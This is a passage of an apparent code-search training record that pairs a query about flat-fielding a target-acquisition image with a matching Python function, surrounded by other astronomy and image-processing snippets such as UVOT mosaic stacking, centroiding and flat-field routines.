stack with uvotimsum\n cmd = 'uvotimsum ' + file_prefix + '_sk_all'+sl_tag+'.fits ' + \\\n 
file_prefix + '_sk'+sl_tag+'.fits exclude=none clobber=yes'\n subprocess.run(cmd, shell=True)\n cmd = 'uvotimsum ' + file_prefix + '_sk_off_all'+sl_tag+'.fits ' + \\\n file_prefix + '_sk_off'+sl_tag+'.fits exclude=none clobber=yes'\n subprocess.run(cmd, shell=True)\n cmd = 'uvotimsum ' + file_prefix + '_ex_all'+sl_tag+'.fits ' + \\\n file_prefix + '_ex'+sl_tag+'.fits method=EXPMAP exclude=none clobber=yes'\n subprocess.run(cmd, shell=True)\n\n # make a count rate image too\n with fits.open(file_prefix + '_sk'+sl_tag+'.fits') as h_sk, fits.open(file_prefix + '_ex'+sl_tag+'.fits') as h_ex:\n cr_hdu = fits.PrimaryHDU(data=h_sk[1].data/h_ex[1].data, header=h_sk[1].header)\n cr_hdu.writeto(file_prefix + '_cr'+sl_tag+'.fits', overwrite=True)\n \n # delete temporary files\n subprocess.run('rm targ_temp_*.fits', shell=True)\n \n \n # ------------------------\n # combine the stacks\n # ------------------------\n\n\n # output file names\n output_file_sk = output_prefix + filt + '_sk'+sl_tag+'.fits'\n output_file_sk_all = output_prefix + filt + '_sk_all'+sl_tag+'.fits'\n output_file_sk_off = output_prefix + filt + '_sk_off'+sl_tag+'.fits'\n output_file_sk_off_all = output_prefix + filt + '_sk_off_all'+sl_tag+'.fits'\n output_file_ex = output_prefix + filt + '_ex'+sl_tag+'.fits'\n output_file_ex_all = output_prefix + filt + '_ex_all'+sl_tag+'.fits'\n output_file_cr = output_prefix + filt + '_cr'+sl_tag+'.fits'\n\n # start out the stacking with the first target ID\n subprocess.run('cp '+ output_prefix + str(target_ids[0]) +'_'+ filt + '_sk'+sl_tag+'.fits ' + output_file_sk, shell=True)\n subprocess.run('cp '+ output_prefix + str(target_ids[0]) +'_'+ filt + '_sk_off'+sl_tag+'.fits ' + output_file_sk_off, shell=True)\n subprocess.run('cp '+ output_prefix + str(target_ids[0]) +'_'+ filt + '_ex'+sl_tag+'.fits ' + output_file_ex, shell=True)\n subprocess.run('cp '+ output_prefix + str(target_ids[0]) +'_'+ filt + '_sk'+sl_tag+'.fits ' + output_file_sk_all, shell=True)\n subprocess.run('cp '+ output_prefix + str(target_ids[0]) +'_'+ filt + '_sk_off'+sl_tag+'.fits ' + output_file_sk_off_all, shell=True)\n subprocess.run('cp '+ output_prefix + str(target_ids[0]) +'_'+ filt + '_ex'+sl_tag+'.fits ' + output_file_ex_all, shell=True)\n # make a count rate image too\n with fits.open(output_file_sk) as h_sk, fits.open(output_file_ex) as h_ex:\n cr_hdu = fits.PrimaryHDU(data=h_sk[1].data/h_ex[1].data, header=h_sk[1].header)\n cr_hdu.writeto(output_file_cr, overwrite=True)\n\n \n # keep track of which target IDs still need to be appended to the image\n remaining_ids = copy.copy(target_ids[1:])\n\n\n # keep going while there are still IDs to append\n while len(remaining_ids) > 0:\n\n # file names for the target IDs\n remaining_id_files_sk = [output_prefix + str(t) + '_' + filt + '_sk'+sl_tag+'.fits' for t in remaining_ids]\n remaining_id_files_sk_off = [output_prefix + str(t) + '_' + filt + '_sk_off'+sl_tag+'.fits' for t in remaining_ids]\n remaining_id_files_ex = [output_prefix + str(t) + '_' + filt + '_ex'+sl_tag+'.fits' for t in remaining_ids]\n \n # find the target ID that has the best overlap with current mosaic\n # (returns index and the overlapping pixels)\n best_ind, overlap_x, overlap_y = most_overlap(output_file_ex, remaining_id_files_ex)\n\n # make an HDU with the counts (sk) image for the mosaic and best ID\n with fits.open(output_file_sk) as hdu_mosaic_sk, fits.open(remaining_id_files_sk[best_ind]) as hdu_best_sk:\n temp_hdu_sk = fits.HDUList()\n temp_hdu_sk.append(fits.ImageHDU(data=hdu_mosaic_sk[1].data, 
header=hdu_mosaic_sk[1].header))\n temp_hdu_sk.append(fits.ImageHDU(data=hdu_best_sk[1].data, header=hdu_best_sk[1].header))\n # make an HDU with the counts offset image for the mosaic and best ID\n with fits.open(output_file_sk_off) as hdu_mosaic_sk_off, fits.open(remaining_id_files_sk_off[best_ind]) as hdu_best_sk_off:\n temp_hdu_sk_off = fits.HDUList()\n temp_hdu_sk_off.append(fits.ImageHDU(data=hdu_mosaic_sk_off[1].data, header=hdu_mosaic_sk_off[1].header))\n temp_hdu_sk_off.append(fits.ImageHDU(data=hdu_best_sk_off[1].data, header=hdu_best_sk_off[1].header))\n # make an HDU with the exposure image for the mosaic and best ID\n with fits.open(output_file_ex) as hdu_mosaic_ex, fits.open(remaining_id_files_ex[best_ind]) as hdu_best_ex:\n temp_hdu_ex = fits.HDUList()\n temp_hdu_ex.append(fits.ImageHDU(data=hdu_mosaic_ex[1].data, header=hdu_mosaic_ex[1].header))\n temp_hdu_ex.append(fits.ImageHDU(data=hdu_best_ex[1].data, header=hdu_best_ex[1].header))\n \n # find the biweight of the overlapping areas\n biweight_cps = calc_overlap_val(temp_hdu_sk, temp_hdu_ex, overlap_x, overlap_y)\n\n # apply to the counts images\n hdu_sk_corr, delta_cps, hdu_delta_counts = correct_sk(temp_hdu_sk, temp_hdu_ex, biweight_cps)\n\n # save those changes to the individual target ID segments\n with fits.open(output_file_sk_all) as hdu_sk_all, fits.open(output_file_sk_off_all) as hdu_sk_off_all, fits.open(output_file_ex_all) as hdu_ex_all:\n # apply offset to existing segments\n for h in range(1,len(hdu_sk_all)):\n hdu_sk_all[h].data = (hdu_sk_all[h].data/hdu_ex_all[h].data + delta_cps[0]) * hdu_ex_all[h].data\n hdu_sk_all[h].data[hdu_ex_all[h].data == 0] = 0\n hdu_sk_off_all[h].data = hdu_sk_off_all[h].data + (delta_cps[0] * hdu_ex_all[h].data)\n # append new corrected segment\n hdu_sk_all.append(fits.ImageHDU(data=hdu_sk_corr[1].data, header=hdu_sk_corr[1].header))\n hdu_sk_off_all.append(fits.ImageHDU(data=hdu_delta_counts[1].data + temp_hdu_sk_off[1].data,\n header=hdu_delta_counts[1].header))\n hdu_ex_all.append(fits.ImageHDU(data=temp_hdu_ex[1].data, header=temp_hdu_ex[1].header))\n # write out to files\n hdu_sk_all.writeto(output_file_sk_all, overwrite=True)\n hdu_sk_off_all.writeto(output_file_sk_off_all, overwrite=True)\n hdu_ex_all.writeto(output_file_ex_all, overwrite=True)\n \n \n # stack with uvotimsum\n cmd = 'uvotimsum ' + output_file_sk_all + ' ' + output_file_sk + ' exclude=none clobber=yes'\n subprocess.run(cmd, shell=True)\n cmd = 'uvotimsum ' + output_file_sk_off_all + ' ' + output_file_sk_off + ' exclude=none clobber=yes'\n subprocess.run(cmd, shell=True)\n cmd = 'uvotimsum ' + output_file_ex_all + ' ' + output_file_ex + ' method=EXPMAP exclude=none clobber=yes'\n subprocess.run(cmd, shell=True)\n\n # make a count rate image too\n with fits.open(output_file_sk) as h_sk, fits.open(output_file_ex) as h_ex:\n cr_hdu = fits.PrimaryHDU(data=h_sk[1].data/h_ex[1].data, header=h_sk[1].header)\n cr_hdu.writeto(output_file_cr, overwrite=True)\n \n # finally, remove this index from the remaining IDs list\n remaining_ids = np.delete(remaining_ids, best_ind)",
"def __call__(self, images, boxes):\n if images.shape[0] != 4:\n err_msg = \"Currently Exact 4 Images are supported by Mosaic Aug.\"\n logging.error(err_msg)\n raise Exception(err_msg)\n\n x, y = self._mosaic_divide_points()\n mosaic_sub_images, mosaic_boxes = self._mosaic(\n images, boxes, mosaic_divide_points=(x, y))\n\n upper_stack = tf.concat([mosaic_sub_images[0], mosaic_sub_images[1]],\n axis=0)\n lower_stack = tf.concat([mosaic_sub_images[2], mosaic_sub_images[3]],\n axis=0)\n mosaic_image = tf.concat([upper_stack, lower_stack], axis=1)\n return mosaic_image, mosaic_boxes",
"def synthetic_image_maker(x_centroids, y_centroids, fwhm=2.5):\n # Construct synthetic images from centroid/flux data.\n synthetic_image = np.zeros((1024, 1024))\n sigma = fwhm/2.355\n for i in range(len(x_centroids)):\n # Cut out little boxes around each source and add in Gaussian representations. This saves time.\n int_centroid_x = int(np.round(x_centroids[i]))\n int_centroid_y = int(np.round(y_centroids[i]))\n y_cut, x_cut = np.mgrid[int_centroid_y-10:int_centroid_y +\n 10, int_centroid_x-10:int_centroid_x+10]\n dist = np.sqrt((x_cut-x_centroids[i])**2+(y_cut-y_centroids[i])**2)\n synthetic_image[y_cut,\n x_cut] += np.exp(-((dist)**2/(2*sigma**2)+((dist)**2/(2*sigma**2))))\n return(synthetic_image)",
"def test_apply_transformation__image_centering(self, image, label):\n\n sample = {'image': image, 'label': label}\n sample_keys = {'image': 'image'}\n transformation_fn = per_image_standardization\n\n sample_centered = apply_transformation(\n transformation_fn, sample, sample_keys\n )\n\n assert sample_centered['image'].shape == sample['image'].shape\n assert np.allclose(sample_centered['image'].mean(), 0, atol=1e-4)\n assert np.allclose(sample_centered['image'].std(), 1, atol=1e-4)\n assert sample_centered['label'] == 1",
"def init_centroids(num_clusters, image):\n\n # *** START CODE HERE ***\n\n #Reshape the image to 2-d\n w,h,d = image.shape\n x = image.reshape((w * h, d)) \n\n #Find out the total number of image points\n #Use the total number of points to randomly select number of centroids from the image\n n = len(x)\n centroids_init = x[np.random.choice(n, num_clusters, replace=False), :]\n # *** END CODE HERE ***\n\n return centroids_init",
"def make_images_several_energyband(image_size,energy_bins, offset_band, source_name, center, data_store, obs_table_subset,\n exclusion_mask, outdir, make_background_image=True, spectral_index=2.3,\n for_integral_flux=False, radius=10.,save_bkg_norm=True):\n list_mosaicimages=list()\n for i, E in enumerate(energy_bins[0:-1]):\n energy_band = Energy([energy_bins[i].value, energy_bins[i + 1].value], energy_bins.unit)\n print energy_band\n mosaicimages=make_images(image_size,energy_band, offset_band, center, data_store, obs_table_subset, exclusion_mask, outdir,\n make_background_image, spectral_index, for_integral_flux, radius,save_bkg_norm)\n list_mosaicimages.append(mosaicimages)\n if save_bkg_norm:\n table=Table()\n for i,mosaic_images in enumerate(list_mosaicimages):\n table_bkg=mosaic_images.table_bkg_scale\n if i==0:\n array_bkg_scale=np.zeros((len(obs_table_subset),len(energy_bins[0:-1])))\n array_counts=np.zeros((len(obs_table_subset),len(energy_bins[0:-1])))\n itot=0 \n for irun,run in enumerate(table_bkg[\"OBS_ID\"]):\n while run!=obs_table_subset[\"OBS_ID\"][itot]:\n itot+=1\n array_bkg_scale[itot,i]=table_bkg[\"bkg_scale\"][irun]\n array_counts[itot,i]=table_bkg[\"N_counts\"][irun]\n itot+=1\n c0 = fits.Column(name=\"OBS_ID\", format='E', array=table_bkg[\"OBS_ID\"].data)\n c1 = fits.Column(name=\"bkg_norm\", format='PE()', array=array_bkg_scale)\n c2 = fits.Column(name=\"counts\", format='PE()', array=array_counts)\n hdu = fits.BinTableHDU.from_columns([c0, c1,c2])\n ebounds = energy_axis_to_ebounds(energy_bins)\n #ebounds = energy_axis_to_ebounds(BinnedDataAxis(energy_bins[0:-1],energy_bins[1:]))\n prim_hdu = fits.PrimaryHDU()\n hdu_list=fits.HDUList([prim_hdu, hdu, ebounds])\n hdu_list.writeto(outdir + \"/table_bkg_norm_.fits\")",
"def centered_image():\n\tjpeg_data = tf.placeholder(tf.string, name = 'CenteredJPGInput')\n\tdecoded_image = tf.image.decode_jpeg(jpeg_data, channels=MODEL_INPUT_CHANNEL)\n\tdecoded_image_as_float = tf.cast(decoded_image, dtype=tf.float32)\n\tdecoded_image_4d = tf.expand_dims(decoded_image_as_float, 0)\n\tcentered_image = tf.image.resize_image_with_crop_or_pad(decoded_image_4d,\n\t\t\t\t\t\t\t\t\t\t\ttarget_height=MODEL_INPUT_HEIGHT,\n\t\t\t\t\t\t\t\t\t\t\ttarget_width=MODEL_INPUT_WIDTH)\n\n\treturn jpeg_data, centered_image",
"def test_center_mask(self):\n target_shape = 8, 22, 30\n transform_center = tio.CropOrPad(target_shape)\n transform_mask = tio.CropOrPad(target_shape, mask_name='label')\n mask = self.sample_subject['label'].data\n mask *= 0\n mask[0, 4:6, 9:11, 14:16] = 1\n transformed_center = transform_center(self.sample_subject)\n transformed_mask = transform_mask(self.sample_subject)\n zipped = zip(transformed_center.values(), transformed_mask.values())\n for image_center, image_mask in zipped:\n self.assert_tensor_equal(\n image_center.data,\n image_mask.data,\n msg='Data is different after cropping',\n )\n self.assert_tensor_equal(\n image_center.affine,\n image_mask.affine,\n msg='Physical position is different after cropping',\n )",
"def update_image(image, centroids):\n\n # *** START CODE HERE ***\n# print(\"Inside update_image\")\n# print(\"This is image shape inside update_image: \", image.shape)\n w,h,d = image.shape\n x = image.reshape((w * h, d)) \n \n #Function to find centroid which is closest to a given point\n def find_min_dist(point, centroids):\n dist_array = []\n for each_centroid in centroids:\n # finding sum of squares\n sum_sq = np.sum(np.square(point - each_centroid))\n\n # Doing squareroot and\n # printing Euclidean distance\n euclid_distance = np.sqrt(sum_sq)\n dist_array.append(euclid_distance)\n\n minpos = dist_array.index(min(dist_array))\n \n return centroids[minpos]\n \n \n #For each point, find the closest centroid\n #Update the point with the value of the closest centroid\n for each_point in range(len(x)):\n x[each_point] = find_min_dist(x[each_point], centroids)\n \n image = x.reshape(image.shape) \n # *** END CODE HERE ***\n\n return image",
"def compute_centers(self):\n for img in self.images:\n for i in self.images_superpixels[img]:\n # Retrieve all indices where superpixel label equals i\n indices = np.where(self.images_segmented[img] == i)\n # Approximate the center by the medians of the indices in x and y dimension\n self.images_superpixels_center[img].append((np.median(indices[1]), np.median(indices[0])))",
"def build_center_uncenter_transforms(image_shape):\n\n # need to swap rows and cols here apparently! confusing!\n center_shift = np.array([image_shape[1], image_shape[0]]) / 2.0 - 0.5\n tform_uncenter = skimage.transform.SimilarityTransform(translation=-center_shift)\n tform_center = skimage.transform.SimilarityTransform(translation=center_shift)\n return tform_center, tform_uncenter",
"def Patch_Center_1D(self,height_index,width_index):\n # when input dataset is crop_43_1D or crop_59_1D, then only use the spectral information to classify pixels.\n patch = np.zeros((self.band, 1, 1))\n offset = (1-1)//2\n h_index = 0; w_index = 0\n for h in range(height_index-offset, height_index+offset+1):\n for w in range(width_index-offset, width_index+offset+1):\n if h<0 or h>=self.height or w<0 or w>=self.width:\n continue\n else:\n patch[:,h-height_index+offset,w-width_index+offset] = self.transpose_array[:,h,w]\n mean_normalized_patch = []\n for i in range(patch.shape[0]):\n mean_normalized_patch.append(patch[i] - self.mean_array[i]) \n return np.array(mean_normalized_patch)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Apply the flat field to a TA image. Assume the flat has the format of the files to be used on board by GENTALOCATE: pixel values are multiplied by 1000 relative to traditional flat field files (i.e. the flat is normalized to a value of 1000), and bad pixels have a value of 65535. Bad pixels receive a value interpolated from their nearest neighbors.
|
def apply_flat_field(image, flat):
# Make sure flat field values are floats
flat = flat * 1.
# Find bad pixels and set to NaN
bad = flat == 65535
print("Found {} bad pixels in the flat.".format(np.sum(bad)))
flat[bad] = np.nan
# Apply flat
image /= (flat/1000.)
# Use surrounding pixels to set bad pixel values
# NOT SURE IF THIS IS IMPLEMENTED IN THE REAL
# GENTALOCATE OR NOT...
if np.any(bad):
image = fixbadpix(image)
return image
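
A minimal usage sketch, assuming numpy is imported as np and apply_flat_field (plus its fixbadpix helper) is defined as above. The synthetic flat below is normalized to 1000 and contains no 65535 bad pixels, so the fixbadpix branch is never taken; the image values and the 5% hot pixel are made up for illustration.

import numpy as np

rng = np.random.default_rng(0)
image = rng.uniform(900., 1100., size=(32, 32))      # hypothetical TA image
flat = np.full((32, 32), 1000, dtype=np.uint16)      # flat normalized to 1000, no bad pixels
flat[10, 10] = 1050                                  # one pixel 5% more sensitive than average

corrected = apply_flat_field(image.copy(), flat)
print(corrected[10, 10] / image[10, 10])             # ~0.952: the extra response is divided out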
|
[
"def apply_flat_field(science, flat):\n\n # Extract subarray from reference data, if necessary\n if reffile_utils.ref_matches_sci(science, flat):\n flat_data = flat.data\n flat_dq = flat.dq\n else:\n log.info(\"Extracting matching subarray from flat\")\n sub_flat = get_subarray_model(science, flat)\n flat_data = sub_flat.data.copy()\n flat_dq = sub_flat.dq.copy()\n sub_flat.close()\n\n # Find pixels in the flat that have a value of NaN and set\n # their DQ to NO_FLAT_FIELD\n flat_nan = np.isnan(flat_data)\n flat_dq[flat_nan] = np.bitwise_or(flat_dq[flat_nan], dqflags.pixel[\"NO_FLAT_FIELD\"])\n\n # Find pixels in the flat have have a value of zero, and set\n # their DQ to NO_FLAT_FIELD\n flat_zero = np.where(flat_data == 0.0)\n flat_dq[flat_zero] = np.bitwise_or(\n flat_dq[flat_zero], dqflags.pixel[\"NO_FLAT_FIELD\"]\n )\n\n # Find all pixels in the flat that have a DQ value of NO_FLAT_FIELD\n flat_bad = np.bitwise_and(flat_dq, dqflags.pixel[\"NO_FLAT_FIELD\"])\n\n # Reset the flat value of all bad pixels to 1.0, so that no\n # correction is made\n flat_data[np.where(flat_bad)] = 1.0\n\n # For CubeModel science data, apply flat to each integration\n if isinstance(science, datamodels.CubeModel):\n for integ in range(science.data.shape[0]):\n # Flatten data and error arrays\n science.data[integ] /= flat_data\n science.err[integ] /= flat_data\n # Combine the science and flat DQ arrays\n science.dq[integ] = np.bitwise_or(science.dq[integ], flat_dq)\n\n # For 2D ImageModel science data, apply flat to entire arrays\n else:\n # Flatten data and error arrays\n science.data /= flat_data\n science.err /= flat_data\n\n # Combine the science and flat DQ arrays\n science.dq = np.bitwise_or(science.dq, flat_dq)",
"def getflat(self):\n\n # The keyword for WFPC2 flat fields in the primary header of the flt\n # file is FLATFILE. This flat file is *not* already in the required \n # units of electrons.\n \n filename = self.header['FLATFILE']\n \n try:\n handle = fileutil.openImage(filename,mode='readonly',writefits=False,memmap=0)\n hdu = fileutil.getExtn(handle,extn=self.grp)\n data = hdu.data[self.ltv2:self.size2,self.ltv1:self.size1]\n except:\n try:\n handle = fileutil.openImage(filename[5:],mode='readonly',writefits=False,memmap=0)\n hdu = fileutil.getExtn(handle,extn=self.grp)\n data = hdu.data[self.ltv2:self.size2,self.ltv1:self.size1]\n except:\n data = np.ones(self.image_shape,dtype=self.image_dtype)\n str = \"Cannot find file \"+filename+\". Treating flatfield constant value of '1'.\\n\"\n print str\n # For the WFPC2 flat we need to invert\n # for use in Multidrizzle\n flat = (1.0/data)\n return flat",
"def add_flat_field(self, PSF_image, flat_delta):\n\n pix, N_chan = PSF_image.shape[0], PSF_image.shape[-1]\n new_PSF = np.zeros_like(PSF_image)\n # print(r\"Adding Flat Field errors [1 - $\\delta$, 1 + $\\delta$]: $\\delta$=%.3f\" % flat_delta)\n # sigma_uniform = flat_delta / np.sqrt(3)\n flat_field = np.random.uniform(low=1 - flat_delta, high=1 + flat_delta, size=(pix, pix))\n for j in range(N_chan):\n new_PSF[:, :, j] = flat_field * PSF_image[:, :, j]\n\n return new_PSF",
"def calculate_flat_field(images):\n\n _, height, _ = images.shape\n print(images.shape)\n filter_sigma = height // 16\n flat_field = gaussian_filter(normalize_and_convert_to_16_bit(np.median(images, axis = 0)), filter_sigma)\n \n print(flat_field.shape)\n return flat_field",
"def do_flat_field(output_model, flat_model):\n\n log.debug(\"Flat field correction \")\n\n any_updated = False # will set True if any flats applied\n\n # Check to see if flat data array is smaller than science data\n if (output_model.data.shape[-1] > flat_model.data.shape[-1]) or (\n output_model.data.shape[-2] > flat_model.data.shape[-2]\n ):\n log.warning(\"Reference data array is smaller than science data\")\n log.warning(\"Step will be skipped\")\n\n # Apply flat to all other models\n else:\n apply_flat_field(output_model, flat_model)\n any_updated = True\n\n if any_updated:\n output_model.meta.cal_step.flat_field = \"COMPLETE\"\n else:\n output_model.meta.cal_step.flat_field = \"SKIPPED\"",
"def make_average_flat_for_grism():\n \n os.chdir('/Users/gbrammer/CANDELS/Flats/')\n f125 = pyfits.open('flat.F125W.fits')\n f160 = pyfits.open('flat.F160W.fits')\n \n avg = f125[1].data*0.5+f160[1].data*0.5\n \n f125[1].data = avg\n f125.writeto('flat.IR_avg.fits', clobber=True)",
"def get_flatfield(n_integrations, n_spatial):\n\n # load the flatfield, interpolate if required using the 133-bin flatfield\n if n_spatial == 133:\n detector_flat = np.load(_os.path.join(pkg_resources.resource_filename('maven_iuvs', 'ancillary/'),\n 'mvn_iuv_flatfield-133spa-muv.npy'))[:, :18]\n elif n_spatial == 50:\n detector_flat = np.load(_os.path.join(pkg_resources.resource_filename('maven_iuvs', 'ancillary/'),\n 'mvn_iuv_flatfield-50spa-muv.npy'))[:, :18]\n else:\n detector_full = np.load(_os.path.join(pkg_resources.resource_filename('maven_iuvs', 'ancillary/'),\n 'mvn_iuv_flatfield-133spa-muv.npy'))[:, :18]\n detector_flat = np.zeros((n_spatial, 18))\n for i in range(18):\n detector_flat[:, i] = np.interp(np.linspace(0, 132, n_spatial), np.arange(133), detector_full[:, i])\n\n # create a flatfield for the given number of integrations\n flatfield = np.repeat(detector_flat[None, :], n_integrations, axis=0)\n\n # return the stacked flatfield\n return flatfield",
"def hrsflat(rawpath, outpath, detname, obsmode, master_bias=None, f_limit=1000, first_order=53, \n y_start=30, y_limit=3920, smooth_length=20, smooth_fraction=0.4, filter_size=151,\n link=False, sdb=None, clobber=True):\n if not os.path.isdir(rawpath): return\n\n image_list = ImageFileCollection(rawpath)\n if len(image_list.files)==0: return\n\n #make output directory\n if not os.path.isdir(outpath): os.mkdir(outpath)\n\n #get the observing date\n obsdate=get_obsdate(image_list.summary['file'][0])\n\n #setup the instrument prefix\n \n if detname=='HRDET':\n prefix='R'\n process = red_process\n rdnoise=6.81*u.electron\n elif detname=='HBDET':\n prefix='H'\n process = blue_process\n rdnoise=7.11*u.electron\n else:\n raise ValueError('detname must be a valid HRS Detector name')\n\n #process the flat frames\n matches = (image_list.summary['obstype'] == 'Flat field') * (image_list.summary['detnam'] == detname) * (image_list.summary['obsmode'] == obsmode) * (image_list.summary['propid'] != 'JUNK')\n flat_list = []\n for fname in image_list.summary['file'][matches]:\n logging.info('Processing flat image {}'.format(fname))\n ccd = process(rawpath+fname, masterbias=master_bias, error=True, rdnoise=rdnoise)\n flat_list.append(ccd)\n if sdb is not None: dq_ccd_insert(rawpath + fname, sdb)\n\n if flat_list:\n outfile = \"{0}/{2}FLAT_{1}_{3}.fits\".format(outpath, obsdate, prefix, obsmode.replace(' ', '_'))\n logging.info('Created master flat {}'.format(os.path.basename(outfile)))\n if os.path.isfile(outfile) and clobber: os.remove(outfile)\n flat = ccdproc.combine(flat_list, method='median', output_file=outfile)\n\n norm = clean_flatimage(flat.data, filter_size=filter_size, flux_limit=0.3,\n block_size=100, percentile_low=30, median_size=5)\n\n norm[norm>0]=1\n if detname=='HRDET':\n xc = 1947 #int(xs/2.0)\n detect_kern = norm[1:100, xc]\n #these remove light that has bleed at the edges and may need adjusting\n norm[:,:20]=0\n norm[:,4040:]=0\n elif detname=='HBDET':\n ys, xs = norm.shape\n xc = int(xs/2.0)\n detect_kern = norm[32:110, xc]\n\n frame = create_orderframe(norm, first_order, xc, detect_kern, smooth_length=smooth_length, \n smooth_fraction=smooth_fraction, y_start=y_start, y_limit=y_limit)\n order_file = \"{0}/{2}ORDER_{1}_{3}.fits\".format(outpath, obsdate, prefix, obsmode.replace(' ', '_'))\n logging.info('Created order frame {}'.format(os.path.basename(order_file)))\n hdu = fits.PrimaryHDU(frame)\n hdu.writeto(order_file, clobber=True)\n if sdb: dq_order_insert(order_file, sdb)\n\n if link:\n link='/salt/HRS_Cals/CAL_FLAT/{0}/{1}/product/{2}'.format(obsdate[0:4], obsdate[4:8], os.path.basename(outfile))\n if os.path.islink(link) and clobber: os.remove(link)\n print(outfile)\n print(link)\n os.symlink(outfile, link)\n olink='/salt/HRS_Cals/CAL_FLAT/{0}/{1}/product/{2}'.format(obsdate[0:4], obsdate[4:8], os.path.basename(order_file))\n if os.path.islink(olink) and clobber: os.remove(olink)\n os.symlink(order_file, olink)",
"def run_make_camera_flat(self):\n outfile = 'camera_flat.fits'\n img_list = []\n for k in self.obs_dict:\n if self.obs_dict[k][1] == 'CAMERA': img_list.append(self.obs_dict[k][0])\n print img_list\n logging.info('\\nCreate a new camera flat with name %s\\n' % outfile) \n gr.make_camera_flat(img_list, outfile)",
"def reshape_flat_field(self, f = None):\n\n if f is None:\n if self.data.ndim == 2:\n new_shape = [self.data.shape[0]] + list((self.lats.shape[0], self.lons.shape[0]))\n self.data = np.reshape(self.data, new_shape)\n else:\n raise Exception('Data field is not flattened, is multi-level or is only temporal (e.g. station)!')\n\n elif f is not None:\n if f.ndim == 2:\n new_shape = [f.shape[0]] + list((self.lats.shape[0], self.lons.shape[0]))\n f = np.reshape(f, new_shape)\n\n return f\n else:\n raise Exception('The field f is not flattened, is multi-level or is only temporal (e.g. station)!')",
"def fill_triangle(tr, art_img, new_img):\n r = cv2.boundingRect(np.float32([tr]))\n t_rec = []\n for i in xrange(0, 3):\n t_rec.append(((tr[i][0] - r[0]),(tr[i][1] - r[1])))\n \n \n mask = np.zeros((r[3], r[2]), dtype = np.float32)\n cv2.fillConvexPoly(mask, np.int32(t_rec), (1.0, 1.0, 1.0), 16, 0);\n art_img_patch = art_img[r[1]:r[1]+r[3], r[0]:r[0]+r[2]]\n\n kx, ky = np.where(mask == 1)\n vals = np.mean(art_img_patch[kx,ky,:], axis=0).astype('int')\n \n #print art_img_patch.shape\n new_img[r[1]:r[1]+r[3], r[0]:r[0]+r[2]][kx,ky,:] = vals[None,None,:] #* (mask[:,:,None])\n #art_img_patch * (mask[:,:,None] ) + ",
"def get_master_flat(filt, infiles=None, name_template=\"Flat-????_{}.fit\", calib_folder=\"\"):\n if filt.lower() in ['h', 'halpha', 'h_alpha', 'ha', 'h_a']:\n filt = 'H'\n elif filt.lower() in ['o', 'oiii', 'o3', 'o_iii', 'o_3']:\n filt = 'O'\n\n test_presence = glob(\"{0:s}master_flat_{1:s}.fits\".format(calib_folder,filt))\n if (len(test_presence)>=1.) and (infiles is None):\n with fits.open(test_presence[0]) as f:\n master_flat_data = f[0].data\n else:\n if infiles is None:\n name_template = name_template.format(filt)\n infiles = []\n for file in glob(\"{0:s}{1:s}\".format(calib_folder,name_template)):\n infiles.append(file[len(calib_folder):])\n data_array, headers = proj_fits.get_obs_data(infiles, data_folder=calib_folder, compute_flux=False)\n # Get Master Darks and Bias\n dark = {}\n for i,head in enumerate(headers):\n dark[head['exptime']] = get_master_dark(head['exptime'], calib_folder=calib_folder)\n bias = get_master_bias(calib_folder=calib_folder)\n # Compute temporary flat\n flat = []\n for i,data in enumerate(data_array):\n flat.append(data-bias-dark[headers[i]['exptime']])\n flat = np.median(flat, axis=0)\n flat += np.median(flat)\n master_flat_data = flat/np.median(flat)\n # Save to fits for next time\n master_flat_header = headers[0].copy()\n master_flat_header.remove('OBJECT')\n master_flat_header['CCD-TEMP'] = np.mean([hdr['CCD-TEMP'] for hdr in headers])\n master_flat_header['IMAGETYP'] = \"Master Flat\"\n master_flat_header.add_history(\"Cal Master Flat {0:s}, {1:d} inputs\".format(filt, data_array.shape[0]))\n hdu = fits.PrimaryHDU(data=master_flat_data, header=master_flat_header)\n hdul = fits.HDUList([hdu])\n hdul.writeto(\"{0:s}master_flat_{1:s}.fits\".format(calib_folder, filt))\n\n return master_flat_data",
"def flat_field_correction(proj, flat, dark, ratio=1.0, use_dark=True,\n **options):\n msg = \"\\n Please use the dictionary format: options={'method':\" \\\n \" 'filter_name', 'para1': parameter_1, 'para2': parameter_2}\"\n flat = ratio * flat\n if use_dark:\n flat_dark = flat - dark\n if 0.0 in flat_dark:\n nmean = np.mean(flat_dark)\n if nmean != 0.0:\n flat_dark[flat_dark == 0.0] = nmean\n else:\n flat_dark[flat_dark == 0.0] = 1\n proj_corr = (np.float32(proj) - dark) / flat_dark\n else:\n proj_corr = (np.float32(proj) - dark) / flat_dark\n else:\n if 0.0 in flat:\n nmean = np.mean(flat)\n if nmean != 0.0:\n flat[flat == 0.0] = nmean\n else:\n flat[flat == 0.0] = 1\n proj_corr = np.float32(proj) / flat\n else:\n proj_corr = np.float32(proj) / flat\n if len(options) != 0:\n for opt_name in options:\n opt = options[opt_name]\n if isinstance(opt, dict):\n method = tuple(opt.values())[0]\n para = tuple(opt.values())[1:]\n if proj_corr.ndim == 2:\n if method in dir(remo):\n proj_corr = getattr(remo, method)(proj_corr, *para)\n elif method in dir(filt):\n proj_corr = getattr(filt, method)(proj_corr, *para)\n elif method in dir(ps):\n proj_corr = getattr(ps, method)(proj_corr, *para)\n else:\n raise ValueError(\"Can't find the method: '{}' in\"\n \" the namespace\".format(method))\n else:\n for i in np.arange(proj_corr.shape[1]):\n if method in dir(remo):\n proj_corr[:, i, :] = getattr(remo, method)(\n proj_corr[:, i, :], *para)\n elif method in dir(filt):\n proj_corr[:, i, :] = getattr(filt, method)(\n proj_corr[:, i, :], *para)\n elif method in dir(ps):\n proj_corr[:, i, :] = getattr(ps, method)(\n proj_corr[:, i, :], *para)\n else:\n raise ValueError(\"Can't find the method: '{}' in \"\n \"the namespace\".format(method))\n else:\n if opt is not None:\n raise ValueError(msg)\n return proj_corr",
"def fancyConvert(image):",
"def applyFlatField(data,chanList=[]):\n\n # get channel list\n chanList = data.BolometerArray.checkChanList(chanList)\n\n if len(chanList)<1: \n data.MessHand.error(\"no valid channel\")\n return\n\n for chan in chanList:\n num = data.BolometerArray.getChanIndex(chan)[0]\n numGain = chan-1\n data.Data[:,num] = data.Data[:,num] / array((data.BolometerArray.Gain[numGain]),'f')\n \n data._DataAna__resetStatistics()",
"def itkImageFAF33_cast(obj: 'itkLightObject') -> \"itkImageFAF33 *\":\n return _itkImagePython.itkImageFAF33_cast(obj)",
